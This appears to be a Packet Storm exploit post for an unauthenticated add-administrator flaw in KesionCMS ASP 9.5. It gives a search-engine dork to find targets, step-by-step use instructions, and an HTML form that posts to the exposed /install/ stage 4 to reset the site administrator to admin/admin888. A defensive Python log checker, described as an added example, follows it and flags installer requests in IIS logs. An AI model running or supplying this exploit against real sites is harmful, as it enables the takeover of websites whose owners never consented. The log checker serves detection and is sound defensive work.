

KesionCMS ASP 9.5 Add Administrator

KesionCMS ASP version 9.5 suffers from an add administrator vulnerability.

Packet Storm

| # Title : KesionCMS ASP v9.5 Reinstall Add Admin Exploit |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit) |
| # Vendor : |
| # Dork : Powered by KesionCMS |

poc :

[+] Dorking in Google or other search engine.

[+] Copy & paste the exploit listed below into a text file and save it with the “.html” extension.

[+] At lines 09 & 16, change the domain name of the target.

[+] The affected folder is /install/.
This is due to direct unauthorized access to the fourth stage (?action=s4) of the script installation.
The fourth stage (?action=s4) is responsible for configuring the settings of the site administrator.
For this reason, the vulnerability can be exploited through the direct link or by using the exploit written below.

[+] Exploit

        Hacked By indoushka  
    </title><link href="" rel="stylesheet" />  
    <script src="" type="text/javascript"></script>  
<script src="" type="text/javascript"></script>  
<script src=""></script>  

<form name="form" method="post" action="" id="form">
<div class="guide">
<div class="guidetitle">
<div class="clear"></div>
<div class="clear"></div>
<input type="hidden" name="action" value="" />
<input type="hidden" name="DBlx" value="" />
<input type="hidden" name="CkbData" value="" />

          <input type="hidden" name="TxtDBName_a" value=""  />  
   <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden"  />  
   <input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" />  
   <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" />  
   <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden"  />

  <div id="">

 <div class="clear"></div>  
 <div class="sjlist">  
    <li><span>网站名称:</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如:Kesion官方站</li>  
    <li><span>网站域名:</span><input name="TxtSiteUrl" value="" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
    <li><span>安装目录:</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
    <li><span>授 权 码:</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text">  
    <li><span>后台目录:</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如:Manage,Admin,后面必须带"/"符号。</li>  
            <li><span> 后台登录验证码:</span>  
             <input type="radio" name="isCode_a" value="True"  /> 启用    
             <input type="radio" value="False"  name="isCode_a" checked="checked"/> 不启用  

             <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用  <input onclick="$('#rzm').hide()" type="radio" value="False"  name="isCode" checked="checked"   /> 不启用   
            <font id="rzm" style="display:none">认证码:<input name="TxtManageCode" value="8888"  id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li>  
  <div class="clear"></div>  
    <li><span>管理员账号:</span><input name="TxtUserName" value="admin"  id="TxtUserName" class="text" type="text"><font color="red">*</font> </li>  
    <li><span>管理员密码:</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li>  
    <li><span>重复密码:</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li>  
  <div class="clear blank10"></div>

        <div style="padding:5px">  
  <input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit">  

Greetings to: jericho * Larry W. Cashdollar * brutelogic * hyp3rlinx * 9aylas * shadow_00715 * LiquidWorm
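A log check a site owner can run to see whether the installer described above is still being served, as an added example that is not part of the original advisory: it reads IIS W3C logs and labels every request into /install/, including the ?action=s4 stage. The sample log lines, the chosen log fields and the `install_prefix` parameter are constructed assumptions.

```python
from urllib.parse import parse_qs

# Constructed IIS W3C log sample (not from the advisory); IPs are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2022-10-01 08:00:01 GET /index.asp - 198.51.100.7 200
2022-10-01 08:00:05 GET /install/ action=s4 203.0.113.9 200
2022-10-01 08:00:09 POST /install/ action=s4 203.0.113.9 302
2022-10-01 08:01:30 POST /Install/ - 203.0.113.9 200
2022-10-01 08:02:00 GET /install/ action=s4 192.0.2.44 404
2022-10-01 08:03:00 GET /news/install/guide.asp - 198.51.100.7 200
"""

def parse_w3c(text):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def classify(entry, install_prefix="/install/"):
    """Return a finding label for installer traffic, or None for unrelated requests."""
    stem = entry["cs-uri-stem"].lower()          # IIS paths are case-insensitive
    if not stem.startswith(install_prefix):
        return None
    if int(entry["sc-status"]) >= 400:
        return "blocked"                          # installer removed or access denied
    params = parse_qs(entry["cs-uri-query"].lower())
    if "s4" in params.get("action", []):
        return "admin-stage-served"               # the stage that sets the admin account
    if entry["cs-method"] == "POST":
        return "installer-post"                   # stage may be carried in the POST body
    return "installer-reachable"

def findings(text, install_prefix="/install/"):
    """List (time, client IP, method, label) for every request into the installer."""
    out = []
    for e in parse_w3c(text):
        label = classify(e, install_prefix)
        if label:
            out.append((f"{e['date']} {e['time']}", e["c-ip"], e["cs-method"], label))
    return out

if __name__ == "__main__":
    print(*findings(SAMPLE_LOG), sep="\n")
```

Once /install/ has been removed or denied on the server, every installer request in the log should carry the `blocked` label.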
